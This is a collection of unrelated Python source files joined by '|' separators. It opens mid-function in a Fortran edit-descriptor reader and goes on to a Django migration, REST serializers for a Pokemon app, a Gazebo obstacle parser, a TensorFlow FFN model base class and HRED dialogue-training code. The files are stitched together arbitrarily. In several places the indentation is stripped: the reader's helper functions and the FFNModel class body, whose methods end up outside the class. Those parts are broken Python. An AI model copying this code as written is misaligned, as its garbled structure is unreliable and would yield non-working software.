        elif isinstance(ed, T):
            # Absolute tab: positions are 1-based in the format
            if (ed.num_chars - 1) < 0:
                state['position'] = 0
            elif ed.num_chars > len(record):
                state['position'] = len(record)
            else:
                state['position'] = ed.num_chars - 1
        elif isinstance(ed, Slash):
            # End of record
            record = _next(records, None)
            state['position'] = 0
            if record is None:
                break
        elif isinstance(ed, Colon):
            # Break if input value satisfied
            if finish_up:
                break
        elif isinstance(ed, (Z, O, B, I)):
            val, state = read_integer(ed, state, record)
            vals.append(val)
        elif isinstance(ed, A):
            val, state = read_string(ed, state, record)
            vals.append(val)
        elif isinstance(ed, L):
            val, state = read_logical(ed, state, record)
            vals.append(val)
        elif isinstance(ed, (F, E, D, EN, ES)):
            val, state = read_float(ed, state, record)
            vals.append(val)
        elif isinstance(ed, G):
            # Difficult to know what is wanted since the type of the input
            # variable is unknown: try the edit descriptors listed in
            # config.G_INPUT_TRIAL_EDS until one parses.
            # n.b. vals and state are not written to if an exception is raised
            resolved = False
            g_trial_eds = iter(config.G_INPUT_TRIAL_EDS)
            while not resolved:
                ed_name = _next(g_trial_eds, '')
                if ed_name.upper() in ('F', 'E', 'D', 'EN', 'ES'):
                    trial_ed = F()
                    trial_ed.width = ed.width
                    trial_ed.decimal_places = ed.decimal_places
                    try:
                        val, state = read_float(trial_ed, state.copy(), record)
                        vals.append(val)
                        resolved = True
                    except ValueError:
                        continue
                elif ed_name.upper() in ('Z', 'O', 'B', 'I'):
                    trial_ed = globals()[ed_name]()
                    trial_ed.width = ed.width
                    trial_ed.min_digits = ed.decimal_places
                    try:
                        val, state = read_integer(trial_ed, state.copy(), record)
                        vals.append(val)
                        resolved = True
                    except ValueError:
                        continue
                elif ed_name.upper() in ('L'):
                    trial_ed = L()
                    trial_ed.width = ed.width
                    try:
                        val, state = read_logical(trial_ed, state.copy(), record)
                        vals.append(val)
                        resolved = True
                    except ValueError:
                        continue
                elif ed_name.upper() in ('A'):
                    trial_ed = A()
                    trial_ed.width = ed.width
                    try:
                        val, state = read_string(trial_ed, state.copy(), record)
                        vals.append(val)
                        resolved = True
                    except ValueError:
                        continue
                elif ed_name in ('G'):
                    raise ValueError('G edit descriptor not permitted in config.G_INPUT_TRIAL_EDS')
                else:
                    raise ValueError('Unrecognised trial edit descriptor string in config.G_INPUT_TRIAL_EDS')
    if config.RET_WRITTEN_VARS_ONLY:
        vals = [val for val in vals if val is not None]
    return vals[:num_vals]
def _interpret_blanks(substr, state):
# Save leading blanks
len_str = len(substr)
if state['blanks_as_zeros']:
# TODO: Are tabs blank characters?
substr = substr.replace(' ', '0')
else:
substr = substr.replace(' ', '')
# If were blanks but have been stripped away, replace with a zero
if len(substr) == 0 and (len_str > 0):
substr = '0'
return substr
def _get_substr(w, record, state):
start = max(state['position'], 0)
end = start + w
# if end > len(record):
# substr = ''
# # TODO: test if no chars transmitted, then poition does not change
# w = 0
# else:
substr = record[start:end]
state['position'] = min(state['position'] + w, len(record))
return substr, state
def _next(it, default=None):
try:
if IS_PYTHON3:
val = next(it)
else:
val = it.next()
except StopIteration:
val = default
return val
def read_string(ed, state, record):
    """Read an A (character) edit descriptor field from ``record``.

    Returns (value, state); the value is padded to the field width with
    config.PROC_PAD_CHAR.
    """
    if ed.width is None:
        # Will assume rest of record is fair game for the
        # unsized A edit descriptor
        # NOTE(review): this permanently mutates ed.width, so a reused
        # descriptor keeps the width from its first record -- confirm intended.
        ed.width = len(record) - state['position']
    substr, state = _get_substr(ed.width, record, state)
    val = substr.ljust(ed.width, config.PROC_PAD_CHAR)
    return (val, state)
def read_integer(ed, state, record):
    """Read an integer field (I, B, O or Z edit descriptor) from ``record``.

    Returns (value, state). On parse failure, raises ValueError when
    state['exception_on_fail'] is set, otherwise returns (None, state).
    """
    substr, state = _get_substr(ed.width, record, state)
    # Negative binary/octal/hex values are rejected unless the processor
    # configuration explicitly allows them.
    if ('-' in substr) and (not config.PROC_ALLOW_NEG_BOZ) and isinstance(ed, (Z, O, B)):
        if state['exception_on_fail']:
            raise ValueError('Negative numbers not permitted for binary, octal or hex')
        else:
            return (None, state)
    # Radix is determined by the edit descriptor type.
    if isinstance(ed, Z):
        base = 16
    elif isinstance(ed, I):
        base = 10
    elif isinstance(ed, O):
        base = 8
    elif isinstance(ed, B):
        base = 2
    # If a negative is followed by blanks, Gfortran and ifort
    # interpret as a zero
    if re.match(r'^ *- +$', substr):
        substr = '0'
    # If a negative or negative and blanks, ifort interprets as
    # zero for an I edit descriptor
    if config.PROC_NEG_AS_ZERO and isinstance(ed, I) and re.match(r'^( *- *| +)$', substr):
        substr = '0'
    # If string is zero length (reading off end of record?),
    # interpret as zero so as to match what would be found in an
    # unwritten FORTRAN variable
    if substr == '':
        if config.RET_UNWRITTEN_VARS_NONE or config.RET_WRITTEN_VARS_ONLY:
            return (None, state)
        else:
            substr = '0'
    teststr = _interpret_blanks(substr, state)
    try:
        val = int(teststr, base)
    except ValueError:
        if state['exception_on_fail']:
            raise ValueError('%s is not a valid input for one of integer, octal, hex or binary' % substr)
        else:
            return (None, state)
    return (val, state)
def read_logical(ed, state, record):
    """Read an L (logical) edit descriptor field from ``record``.

    Accepts optional leading blanks and an optional leading period; the first
    remaining letter decides: T -> True, F -> False. Returns (value, state).
    """
    substr, state = _get_substr(ed.width, record, state)
    # Deal with case where there is no more input to read from
    if (substr == '') and (config.RET_UNWRITTEN_VARS_NONE or config.RET_WRITTEN_VARS_ONLY):
        return (None, state)
    # Remove preceding whitespace and take the first two letters as
    # uppercase for testing
    teststr = substr.upper().lstrip().lstrip('.')
    if len(teststr):
        teststr = teststr[0]
    else:
        # This is case where just a preceding period is read in
        # NOTE(review): this raises unconditionally, unlike the T/F branch
        # below which honours state['exception_on_fail'] -- confirm intended.
        raise ValueError('%s is not a valid boolean input' % substr)
    if teststr == 'T':
        val = True
    elif teststr == 'F':
        val = False
    else:
        if state['exception_on_fail']:
            raise ValueError('%s is not a valid boolean input' % substr)
        else:
            val = None
    return (val, state)
def read_float(ed, state, record):
    """Read a real-number field (F, E, D, EN or ES edit descriptor).

    Normalises Fortran exponent syntax (D exponents, implicit exponent signs,
    various ifort leniencies) into something Python's float() accepts, then
    applies the implicit decimal point and scale-factor rules. Returns
    (value, state); on failure raises ValueError or returns (None, state)
    depending on state['exception_on_fail'].
    """
    substr, state = _get_substr(ed.width, record, state)
    teststr = _interpret_blanks(substr, state)
    # When reading off end of record, get empty string,
    # interpret as 0
    if teststr == '':
        if config.RET_UNWRITTEN_VARS_NONE or config.RET_WRITTEN_VARS_ONLY:
            return (None, state)
        else:
            teststr = '0'
    # Python only understands 'E' as an exponential letter
    teststr = teststr.upper().replace('D', 'E')
    # Prepend an exponential letter if only a '-' or '+' denotes an exponent
    # (skip the first character so a leading sign is not treated as one)
    if 'E' not in teststr:
        teststr = teststr[0] + teststr[1:].replace('+', 'E+').replace('-', 'E-')
    # ifort allows '.' to be interpreted as 0
    if re.match(r'^ *\. *$', teststr):
        teststr = '0'
    # ifort allows '-' to be interpreted as 0
    if re.match(r'^ *- *$', teststr):
        teststr = '0'
    # ifort allows numbers to end with 'E', 'E+', 'E-' and 'D'
    # equivalents
    res = re.match(r'(.*)(E|E\+|E\-)$', teststr)
    if res:
        teststr = res.group(1)
    try:
        val = float(teststr)
    except ValueError:
        if state['exception_on_fail']:
            raise ValueError('%s is not a valid input as for an E, ES, EN or D edit descriptor' % substr)
        else:
            return (None, state)
    # Special cases: insert a decimal if none specified
    if ('.' not in teststr) and (ed.decimal_places is not None):
        val = val / 10 ** ed.decimal_places
    # Apply scale factor if exponent not supplied
    if 'E' not in teststr:
        val = val / 10 ** state['scale']
    return (val, state)
|
# Generated by Django 3.1.5 on 2021-02-09 12:18
from django.db import migrations, models


class Migration(migrations.Migration):
    """Add the many-to-many Teacher.subjects relation to subjects.Subject."""

    dependencies = [
        ('subjects', '0003_auto_20210209_1218'),
        ('teachers', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='teacher',
            name='subjects',
            field=models.ManyToManyField(to='subjects.Subject'),
        ),
    ]
|
from django.conf import settings
from django.contrib.auth import get_user_model
from rest_framework import serializers

from core.models import PokedexCreature, Pokemon
class PokedexCreatureSerializer(serializers.ModelSerializer):
    """Serializer of PokedexCreature object"""

    class Meta:
        model = PokedexCreature
        # List view: only the summary columns are exposed.
        fields = (
            "id",
            "name",
            "type_1",
            "type_2",
            "generation",
            "legendary",
        )
        read_only_fields = ("id",)
class PokedexCreatureDetailSerializer(serializers.ModelSerializer):
    """Serializer to retrieve detail of PokedexCreature object"""

    class Meta:
        model = PokedexCreature
        # Detail view exposes every model field.
        fields = "__all__"
        read_only_fields = ("id",)
class UserSerializer(serializers.ModelSerializer):
    """Serializer to retrieve a user."""

    class Meta:
        # ModelSerializer needs the actual model class. settings.AUTH_USER_MODEL
        # is only the "app_label.ModelName" string and breaks field
        # introspection; get_user_model() resolves it to the configured class.
        model = get_user_model()
        fields = ["id", "username", "email"]
class PokemonSerializer(serializers.ModelSerializer):
    """Serializer of Pokemon object"""

    # DRF only registers *instances* of serializers/fields as declared fields;
    # the bare classes previously assigned here (missing "()") were silently
    # ignored and the relations fell back to plain primary-key fields.
    pokedex_creature = PokedexCreatureDetailSerializer()
    trainer = UserSerializer()

    class Meta:
        model = Pokemon
        fields = (
            "id",
            "pokedex_creature",
            "trainer",
            "surname",
            "level",
            "experience",
        )
        read_only_fields = ("id", "level", "experience")

    def validate(self, attrs):
        """Add pokemon surname if no surname is given"""
        surname = attrs.get("surname")
        pokedex_creature = attrs.get("pokedex_creature")
        # Guard against a missing creature so defaulting the surname cannot
        # raise AttributeError before field validation reports the real error.
        if not surname and pokedex_creature is not None:
            attrs["surname"] = pokedex_creature.name
        return super().validate(attrs)
|
import xml.etree.ElementTree as ET
import pandas as pd
import numpy as np
'''
Parse relevant obstacle info from world file
input : path to the worl file
output : panda dataframe structured as follow
Reference | Name | Position | Size
Reference : Which obstacle it is
Name : Name of the part of the obstacle
Position : Position of the center of the part of the obstacle (x,y,z,yaw,pitch,roll)
Size : Size of the part of the obstacle (x,y,z)
Examples:
For first part of wall1
Reference is 1
Name wall1_1*1.5_1
Position 1.0 3.0 0.75 0 -0 0
Size 1 0.2 1.5
For second part of wall2
Reference is 2
Name wall2_1.0*0.2_1
Position 4.5 6.0 0.1 0 -0 0
Size 2.0 0.2 0.2
Pandas API : https://pandas.pydata.org/pandas-docs/stable/reference/index.html
'''
def parse_obstacles(filename):
    """Parse wall obstacles from a Gazebo .world file.

    Args:
        filename: path to the world (SDF/XML) file.

    Returns:
        DataFrame with one row per wall model and columns
        ['Reference', 'Name', 'Position', 'Size'] (all raw strings):
        Reference is the digit following 'wall' in the model name, Position
        is the model's <pose> text and Size the <box><size> text.
    """
    tree = ET.parse(filename)
    rows = []
    for model in tree.findall('world/model'):
        # Read the model name from the attribute directly instead of the old
        # str(m.attrib).split("'")[3] hack, which depended on dict-repr
        # formatting and broke if the model carried extra attributes.
        name = model.get('name', '')
        if 'wall' not in name:
            continue
        # Gather pose and size from *this* model so rows cannot misalign when
        # the world also contains non-wall models (the previous global
        # findall('world/model/pose') collected poses from every model).
        pose = model.find('pose')
        size = model.find('link/visual/geometry/box/size')
        rows.append({
            'Reference': name[4],  # digit after the 'wall' prefix
            'Name': name,
            'Position': pose.text if pose is not None else None,
            'Size': size.text if size is not None else None,
        })
    obstacles = pd.DataFrame(rows, columns=['Reference', 'Name', 'Position', 'Size'])
    obstacles.reset_index(drop=True, inplace=True)
    return(obstacles)
def transfertype(datalist):
    """Convert a list of whitespace-separated number strings into lists of floats.

    E.g. ['1.0 3.0 0.75'] -> [[1.0, 3.0, 0.75]].
    """
    return [[float(token) for token in entry.split()] for entry in datalist]
def createObs(center, size):
    """Build centre points and axis-aligned bounding boxes for obstacles.

    Args:
        center: list of [x, y, z] obstacle centres.
        size: list of [x, y, z] obstacle extents, parallel to ``center``.

    Returns:
        (pos, obs): pos is a list of (x, y, z) centre tuples; obs is a list
        of (xmin, ymin, zmin, xmax, ymax, zmax) box tuples.
    """
    pos = []
    obs = []
    for idx, c in enumerate(center):
        s = size[idx]
        pos.append((c[0], c[1], c[2]))
        obs.append((c[0] - s[0]/2, c[1] - s[1]/2, c[2] - s[2]/2,
                    c[0] + s[0]/2, c[1] + s[1]/2, c[2] + s[2]/2))
    return pos, obs
if __name__ == "__main__":
    # Smoke test: parse the sample world file and print the derived obstacle
    # centres and bounding boxes (requires 'world_test.world' alongside).
    obstacles = parse_obstacles('world_test.world')
    print(obstacles)
    obscenter = obstacles['Position'].values.tolist()
    obssize = obstacles['Size'].values.tolist()
    # Convert the raw pose/size strings to float lists before building boxes.
    obscenter_ = transfertype(obscenter)
    obssize_ = transfertype(obssize)
    pos, obs = createObs(obscenter_, obssize_)
    # print(obscenter_)
    # print(obssize_)
    print(pos)
    print(obs)
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classes for FFN model definition."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from . import optimizer
class FFNModel(object):
"""Base class for FFN models."""
# Dimensionality of the model (2 or 3).
dim = None
############################################################################
# (x, y, z) tuples defining various properties of the network.
# Note that 3-tuples should be used even for 2D networks, in which case
# the third (z) value is ignored.
# How far to move the field of view in the respective directions.
deltas = None
# Size of the input image and seed subvolumes to be used during inference.
# This is enough information to execute a single prediction step, without
# moving the field of view.
input_image_size = None
input_seed_size = None
# Size of the predicted patch as returned by the model.
pred_mask_size = None
###########################################################################
# TF op to compute loss optimized during training. This should include all
# loss components in case more than just the pixelwise loss is used.
loss = None
# TF op to call to perform loss optimization on the model.
train_op = None
def __init__(self, deltas, batch_size=None, define_global_step=True):
    """Initializes the FFN model skeleton.

    Args:
      deltas: (x, y, z) step sizes for moving the field of view.
      batch_size: optional batch size used for input shape inference.
      define_global_step: whether to create the global_step variable.
    """
    assert self.dim is not None
    self.deltas = deltas
    self.batch_size = batch_size
    # Initialize the shift collection. This is used during training with the
    # fixed step size policy: all 26 (3D) non-zero combinations of +-delta/0
    # moves along each axis.
    self.shifts = []
    for dx in (-self.deltas[0], 0, self.deltas[0]):
        for dy in (-self.deltas[1], 0, self.deltas[1]):
            for dz in (-self.deltas[2], 0, self.deltas[2]):
                if dx == 0 and dy == 0 and dz == 0:
                    continue
                self.shifts.append((dx, dy, dz))
    if define_global_step:
        self.global_step = tf.Variable(0, name='global_step', trainable=False)
    # The seed is always a placeholder which is fed externally from the
    # training/inference drivers.
    self.input_seed = tf.placeholder(tf.float32, name='seed')
    self.input_patches = tf.placeholder(tf.float32, name='patches')
    # For training, labels should be defined as a TF object.
    self.labels = None
    # Optional. Provides per-pixel weights with which the loss is multiplied.
    # If specified, should have the same shape as self.labels.
    self.loss_weights = None
    self.logits = None  # type: tf.Operation
    # List of image tensors to save in summaries. The images are concatenated
    # along the X axis.
    self._images = []
def set_uniform_io_size(self, patch_size):
    """Initializes unset input/output sizes to 'patch_size', sets input shapes.

    This assumes that the inputs and outputs are of equal size, and that
    exactly one step is executed in every direction during training.

    Args:
      patch_size: (x, y, z) specifying the input/output patch size

    Returns:
      None
    """
    # Only fill in the sizes that have not been configured explicitly.
    for size_attr in ('pred_mask_size', 'input_seed_size', 'input_image_size'):
        if getattr(self, size_attr) is None:
            setattr(self, size_attr, patch_size)
    self.set_input_shapes()
def set_input_shapes(self):
    """Sets the shape inference for input_seed and input_patches.

    Assumes input_seed_size and input_image_size are already set.
    """
    # Sizes are stored as (x, y, z); TF tensors are laid out as
    # [batch, z, y, x, channels], hence the [::-1] reversal.
    seed_shape = [self.batch_size] + list(self.input_seed_size[::-1]) + [1]
    image_shape = [self.batch_size] + list(self.input_image_size[::-1]) + [1]
    self.input_seed.set_shape(seed_shape)
    self.input_patches.set_shape(image_shape)
def set_up_sigmoid_pixelwise_loss(self, logits):
    """Sets up a weighted sigmoid cross-entropy loss over `logits`."""
    assert self.labels is not None
    assert self.loss_weights is not None
    # Per-pixel cross-entropy, scaled by the per-pixel weights, then
    # averaged into a scalar.
    weighted = self.loss_weights * tf.nn.sigmoid_cross_entropy_with_logits(
        logits=logits, labels=self.labels)
    self.loss = tf.reduce_mean(weighted)
    tf.summary.scalar('pixel_loss', self.loss)
    # Fail fast on NaN/Inf losses instead of silently diverging.
    self.loss = tf.verify_tensor_all_finite(self.loss, 'Invalid loss detected')
def set_up_optimizer(self, loss=None, max_gradient_entry_mag=0.7):
    """Sets up the training op for the model.

    Args:
      loss: TF op computing the scalar loss to optimize; defaults to
        self.loss when not provided.
      max_gradient_entry_mag: if > 0, every gradient entry is clipped to
        [-max_gradient_entry_mag, +max_gradient_entry_mag].
    """
    if loss is None:
        loss = self.loss
    # Log the loss that is actually optimized (previously logged
    # self.loss, which can differ when `loss` is passed explicitly).
    tf.summary.scalar('optimizer_loss', loss)

    opt = optimizer.optimizer_from_flags()
    grads_and_vars = opt.compute_gradients(loss)

    for g, v in grads_and_vars:
        if g is None:
            tf.logging.error('Gradient is None: %s', v.op.name)

    if max_gradient_entry_mag > 0.0:
        # Skip None gradients here: tf.clip_by_value raises on None, so the
        # original code crashed whenever a variable had no gradient.
        grads_and_vars = [(tf.clip_by_value(g,
                                            -max_gradient_entry_mag,
                                            +max_gradient_entry_mag), v)
                          for g, v in grads_and_vars if g is not None]

    trainables = tf.trainable_variables()
    if trainables:
        for var in trainables:
            tf.summary.histogram(var.name, var)
        for grad, var in grads_and_vars:
            # Prefix gradient summaries so their names do not collide with
            # the variable histograms recorded above.
            tf.summary.histogram('gradients/%s' % var.name, grad)

    # Make sure UPDATE_OPS (e.g. batch-norm moving averages) run before
    # the gradient application.
    update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
    with tf.control_dependencies(update_ops):
        self.train_op = opt.apply_gradients(grads_and_vars,
                                            global_step=self.global_step,
                                            name='train')
def show_center_slice(self, image, sigmoid=True):
    """Queues the middle slice (along axis 1) of `image` for summaries."""
    mid = image.get_shape().dims[1] // 2
    center = image[:, mid, :, :, :]
    if sigmoid:
        # Map logits into [0, 1] for visualization.
        center = tf.sigmoid(center)
    self._images.append(center)
def add_summaries(self):
    """Hook for subclasses to register extra TF summaries; no-op here."""
    pass
def update_seed(self, seed, update):
    """Updates the initial 'seed' with 'update'.

    If the predicted patch is smaller than the seed, the update is
    zero-padded symmetrically so that it lands in the center of the seed.

    Args:
      seed: [batch, z, y, x, 1] seed tensor.
      update: [batch, z, y, x, 1] prediction to add; may be smaller than
        `seed` by (input_seed_size - pred_mask_size) per axis.

    Returns:
      The updated seed tensor.
    """
    # Per-axis size differences; sizes are stored as (x, y, z).
    dx = self.input_seed_size[0] - self.pred_mask_size[0]
    dy = self.input_seed_size[1] - self.pred_mask_size[1]
    dz = self.input_seed_size[2] - self.pred_mask_size[2]
    if dx == 0 and dy == 0 and dz == 0:
        seed += update
    else:
        # Tensor layout is [batch, z, y, x, channel]; pad each spatial axis
        # by floor/ceil halves so odd differences remain centered.
        seed += tf.pad(update, [[0, 0],
                                [dz // 2, dz - dz // 2],
                                [dy // 2, dy - dy // 2],
                                [dx // 2, dx - dx // 2],
                                [0, 0]])
    return seed
def define_tf_graph(self):
    """Creates the TensorFlow graph representing the model.

    If self.labels is not None, the graph should include operations for
    computing and optimizing the loss.

    Raises:
      NotImplementedError: always; subclasses must override this method.
    """
    msg = 'DefineTFGraph needs to be defined by a subclass.'
    raise NotImplementedError(msg)
|
import argparse
import time
import torch.nn.init as init
import torch.optim as optim
from torch.utils.data import DataLoader
from parlai.core.torch_generator_agent import TorchGeneratorAgent, PPLMetric
from parlai.core.torch_agent import Batch
from parlai.utils.misc import warn_once
from .modules import *
from .util import *
from collections import Counter, namedtuple
from parlai.core.metrics import SumMetric, AverageMetric, BleuMetric, FairseqBleuMetric
# Fix all RNG seeds so training runs are reproducible; mirror the seed on
# the GPU when CUDA is available.
use_cuda = torch.cuda.is_available()
torch.manual_seed(123)
np.random.seed(123)
if use_cuda:
    torch.cuda.manual_seed(123)
### Begin Harshal code
# This code is not used for now.
def get_args():
    """Parses the standalone-script command line for the HRED trainer.

    Returns:
        argparse.Namespace with all HRED hyper-parameters and run flags.
    """
    p = argparse.ArgumentParser(description='HRED parameter options')
    # run identification / control
    p.add_argument('-n', dest='name', help='enter suffix for model files', required=True)
    p.add_argument('-e', dest='epoch', type=int, default=20, help='number of epochs')
    p.add_argument('-pt', dest='patience', type=int, default=-1, help='validtion patience for early stopping default none')
    # behavioral switches
    p.add_argument('-tc', dest='teacher', action='store_true', default=False, help='default teacher forcing')
    p.add_argument('-bi', dest='bidi', action='store_true', default=False, help='bidirectional enc/decs')
    p.add_argument('-test', dest='test', action='store_true', default=False, help='only test or inference')
    p.add_argument('-shrd_dec_emb', dest='shrd_dec_emb', action='store_true', default=False, help='shared embedding in/out for decoder')
    p.add_argument('-btstrp', dest='btstrp', default=None, help='bootstrap/load parameters give name')
    p.add_argument('-lm', dest='lm', action='store_true', default=False, help='enable a RNN language model joint training as well')
    p.add_argument('-toy', dest='toy', action='store_true', default=False, help='loads only 1000 training and 100 valid for testing')
    p.add_argument('-pretty', dest='pretty', action='store_true', default=False, help='pretty print inference')
    p.add_argument('-mmi', dest='mmi', action='store_true', default=False, help='Using the mmi anti-lm for ranking beam')
    # model hyper-parameters
    p.add_argument('-drp', dest='drp', type=float, default=0.3, help='dropout probability used all throughout')
    p.add_argument('-nl', dest='num_lyr', type=int, default=1, help='number of enc/dec layers(same for both)')
    p.add_argument('-lr', dest='lr', type=float, default=0.001, help='learning rate for optimizer')
    p.add_argument('-bs', dest='bt_siz', type=int, default=100, help='batch size')
    p.add_argument('-bms', dest='beam', type=int, default=1, help='beam size for decoding')
    p.add_argument('-vsz', dest='vocab_size', type=int, default=10005, help='size of vocabulary')
    p.add_argument('-esz', dest='emb_size', type=int, default=300, help='embedding size enc/dec same')
    p.add_argument('-uthid', dest='ut_hid_size', type=int, default=600, help='encoder utterance hidden state')
    p.add_argument('-seshid', dest='ses_hid_size', type=int, default=1200, help='encoder session hidden state')
    p.add_argument('-dechid', dest='dec_hid_size', type=int, default=600, help='decoder hidden state')
    return p.parse_args()
def init_param(model):
    """Initializes model parameters in place.

    Embedding weights are skipped so the padding-index rows stay zero;
    recurrent / language-model weight matrices get orthogonal init, and
    everything else a small Gaussian.
    """
    for name, param in model.named_parameters():
        # skip over the embeddings so that the padding index ones are 0
        if 'embed' in name:
            continue
        elif ('rnn' in name or 'lm' in name) and len(param.size()) >= 2:
            # init.orthogonal / init.normal are deprecated (removed in
            # modern torch); use the in-place underscore variants.
            init.orthogonal_(param)
        else:
            init.normal_(param, 0, 0.01)
def clip_gnorm(model):
    """Rescales each parameter's gradient in place so its norm is <= 1."""
    for name, p in model.named_parameters():
        if p.grad is None:
            # Parameters that did not participate in the forward pass have
            # no gradient; the original code crashed on them.
            continue
        param_norm = p.grad.data.norm()
        if param_norm > 1:
            p.grad.data.mul_(1 / param_norm)
def train(options, model):
    """Runs the full HRED training loop with early stopping.

    Args:
        options: parsed argparse namespace (see get_args()).
        model: the HRED model to train; mutated in place.

    Side effects: saves best model/optimizer state to
    '<name>_mdl.pth' / '<name>_opti_st.pth'.

    NOTE(review): uses the legacy torch<=0.3 `loss.data[0]` API and
    `size_average=False`; presumably pinned to an old torch version.
    """
    model.train()
    optimizer = optim.Adam(model.parameters(), options.lr)
    # Either warm-start from a bootstrap checkpoint or initialize fresh.
    if options.btstrp:
        load_model_state(model, options.btstrp + "_mdl.pth")
        load_model_state(optimizer, options.btstrp + "_opti_st.pth")
    else:
        init_param(model)
    # Toy mode trims the datasets for quick smoke tests.
    if options.toy:
        train_dataset, valid_dataset = MovieTriples('train', 1000), MovieTriples('valid', 100)
    else:
        train_dataset, valid_dataset = MovieTriples('train'), MovieTriples('valid')
    train_dataloader = DataLoader(train_dataset, batch_size=options.bt_siz, shuffle=True, num_workers=2,
                                  collate_fn=custom_collate_fn)
    valid_dataloader = DataLoader(valid_dataset, batch_size=options.bt_siz, shuffle=True, num_workers=2,
                                  collate_fn=custom_collate_fn)
    print("Training set {} Validation set {}".format(len(train_dataset), len(valid_dataset)))
    # 10003 is the padding token id (see ignore_index); summed loss is
    # normalized by the non-pad token count below.
    criteria = nn.CrossEntropyLoss(ignore_index=10003, size_average=False)
    if use_cuda:
        criteria.cuda()
    best_vl_loss, patience, batch_id = 10000, 0, 0
    for i in range(options.epoch):
        if patience == options.patience:
            break
        tr_loss, tlm_loss, num_words = 0, 0, 0
        strt = time.time()
        for i_batch, sample_batch in enumerate(tqdm(train_dataloader)):
            # Anneal the teacher-forcing ratio with an inverse-sigmoid
            # schedule in the number of batches seen.
            new_tc_ratio = 2100.0/(2100.0 + math.exp(batch_id/2100.0))
            model.dec.set_tc_ratio(new_tc_ratio)
            preds, lmpreds = model(sample_batch)
            # sample_batch[4] is the third utterance (the reply target).
            u3 = sample_batch[4]
            if use_cuda:
                u3 = u3.cuda()
            # Shift: predict token t+1 from prefix up to t.
            preds = preds[:, :-1, :].contiguous().view(-1, preds.size(2))
            u3 = u3[:, 1:].contiguous().view(-1)
            loss = criteria(preds, u3)
            target_toks = u3.ne(10003).long().sum().data[0]
            num_words += target_toks
            tr_loss += loss.data[0]
            # Per-token loss for the backward pass.
            loss = loss/target_toks
            if options.lm:
                # Joint RNN language-model loss on the same targets.
                lmpreds = lmpreds[:, :-1, :].contiguous().view(-1, lmpreds.size(2))
                lm_loss = criteria(lmpreds, u3)
                tlm_loss += lm_loss.data[0]
                lm_loss = lm_loss/target_toks
            optimizer.zero_grad()
            # retain_graph so the optional lm_loss backward can reuse it.
            loss.backward(retain_graph=True)
            if options.lm:
                lm_loss.backward()
            clip_gnorm(model)
            optimizer.step()
            batch_id += 1
        vl_loss = calc_valid_loss(valid_dataloader, criteria, model)
        print("Training loss {} lm loss {} Valid loss {}".format(tr_loss/num_words, tlm_loss/num_words, vl_loss))
        print("epoch {} took {} mins".format(i+1, (time.time() - strt)/60.0))
        print("tc ratio", model.dec.get_tc_ratio())
        # Checkpoint on improvement; toy mode always saves.
        if vl_loss < best_vl_loss or options.toy:
            torch.save(model.state_dict(), options.name + '_mdl.pth')
            torch.save(optimizer.state_dict(), options.name + '_opti_st.pth')
            best_vl_loss = vl_loss
            patience = 0
        else:
            patience += 1
def load_model_state(mdl, fl):
    """Restores `mdl` (a module or optimizer) from the state dict at path `fl`."""
    mdl.load_state_dict(torch.load(fl))
def sort_key(temp, mmi):
    """Scores a beam candidate (sequence, log-prob, lm log-prob).

    With mmi: anti-LM score with a length bonus; otherwise
    length-normalized log-likelihood (alpha = 0.7).
    """
    seq, score, lm_score = temp[0], temp[1], temp[2]
    if not mmi:
        return score / len(seq) ** 0.7
    lambda_param = 0.25
    return score - lambda_param * lm_score + 0.1 * len(seq)
def get_sent_ll(u3, u3_lens, model, criteria, ses_encoding):
    """Returns the per-token log-likelihood of `u3` under the decoder.

    NOTE(review): relies on the legacy `.data[0]` scalar access
    (torch<=0.3); on modern torch this would need `.item()`.
    """
    preds, _ = model.dec([ses_encoding, u3, u3_lens])
    # Shifted next-token prediction, flattened for the criterion.
    preds = preds[:, :-1, :].contiguous().view(-1, preds.size(2))
    u3 = u3[:, 1:].contiguous().view(-1)
    loss = criteria(preds, u3).data[0]
    # 10003 is the pad id; normalize by real token count.
    target_toks = u3.ne(10003).long().sum().data[0]
    return -1*loss/target_toks
# sample a sentence from the test set by using beam search
def inference_beam(dataloader, model, inv_dict, options):
    """Generates responses for a test set with beam search.

    Loads the best checkpoint ('<name>_mdl.pth'), reports test perplexity,
    writes "ground truth | prediction" pairs to '<name>_result.txt'.
    """
    criteria = nn.CrossEntropyLoss(ignore_index=10003, size_average=False)
    if use_cuda:
        criteria.cuda()
    # Force teacher forcing while scoring; restored at the end.
    cur_tc = model.dec.get_teacher_forcing()
    model.dec.set_teacher_forcing(True)
    fout = open(options.name + "_result.txt",'w')
    load_model_state(model, options.name + "_mdl.pth")
    model.eval()
    test_ppl = calc_valid_loss(dataloader, criteria, model)
    print("test preplexity is:{}".format(test_ppl))
    for i_batch, sample_batch in enumerate(dataloader):
        # (u1, u2) context utterances, u3 reference reply.
        u1, u1_lens, u2, u2_lens, u3, u3_lens = sample_batch[0], sample_batch[1], sample_batch[2], sample_batch[3], \
                                                sample_batch[4], sample_batch[5]
        if use_cuda:
            u1 = u1.cuda()
            u2 = u2.cuda()
            u3 = u3.cuda()
        # Encode both utterances, then the session over their sequence.
        o1, o2 = model.base_enc((u1, u1_lens)), model.base_enc((u2, u2_lens))
        qu_seq = torch.cat((o1, o2), 1)
        # if we need to decode the intermediate queries we may need the hidden states
        final_session_o = model.ses_enc(qu_seq)
        # forward(self, ses_encoding, x=None, x_lens=None, beam=5 ):
        # NOTE(review): iterates options.bt_siz, not the actual batch size;
        # presumably fails on a final partial batch — verify.
        for k in range(options.bt_siz):
            sent = generate(model, final_session_o[k, :, :].unsqueeze(0), options)
            pt = tensor_to_sent(sent, inv_dict)
            # greedy true for below because only beam generates a tuple of sequence and probability
            gt = tensor_to_sent(u3[k, :].unsqueeze(0).data.cpu().numpy(), inv_dict, True)
            fout.write(str(gt[0]) + " | " + str(pt[0][0]) + "\n")
            fout.flush()
            if not options.pretty:
                print(pt)
